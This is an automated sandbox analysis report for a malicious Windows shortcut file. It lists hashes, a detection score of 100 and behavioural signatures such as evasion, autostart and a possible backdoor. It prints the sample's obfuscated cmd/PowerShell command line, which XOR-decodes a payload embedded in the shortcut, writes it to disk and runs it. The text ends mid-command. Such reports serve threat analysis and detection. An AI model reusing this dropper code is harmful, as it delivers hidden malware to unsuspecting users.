Windows Analysis Report
knfV5IVjEV.lnk
Overview
General Information
Sample name: knfV5IVjEV.lnk (renamed file extension from none to lnk, renamed because original name is a hash value)
Original sample name: 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Analysis ID: 1430699
MD5: 9d6c79c0b395cceb83662aa3f7ed0123
SHA1: 65f5f7d127c478522e9669200de20000edcb6cfb
SHA256: 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Deletes itself after installation
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected Obfuscated Powershell
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7464 cmdline:
"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-